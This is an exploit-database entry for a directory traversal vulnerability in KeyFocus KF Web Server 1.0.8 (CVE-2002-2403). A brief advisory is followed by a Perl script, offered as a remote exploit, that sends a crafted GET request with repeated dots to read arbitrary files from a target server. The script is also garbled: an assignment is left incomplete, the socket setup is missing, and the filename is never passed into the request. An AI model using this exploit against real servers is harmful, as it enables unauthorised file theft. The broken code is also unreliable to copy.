keyfocus kf Web server 1.0.8 - Directory Traversal Vulnerability

ID EDB-ID:22018
Type exploitdb
Reporter mattmurphy
Modified 2002-11-13T00:00:00


KeyFocus KF Web Server 1.0.8 Directory Traversal Vulnerability. CVE-2002-2403. Remote exploit for windows platform


KeyFocus KF Web Server is vulnerable to a directory traversal attack. This is due to the web server's inability to properly handle file names containing consecutive dot characters. By exploiting this vulnerability, an attacker is able to break out of the web root and retrieve any file readable by the web server. Only files of recognized MIME types can be retrieved. 

use URI::Escape;
use IO::Socket;
if (@ARGV < 2) {
print STDOUT "Usage: perl $0 [filename] [host] [port]";
} else {
$f =
$url = uri_escape($ARGV[0]);
$exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n");
print $f $exploit;
undef $f;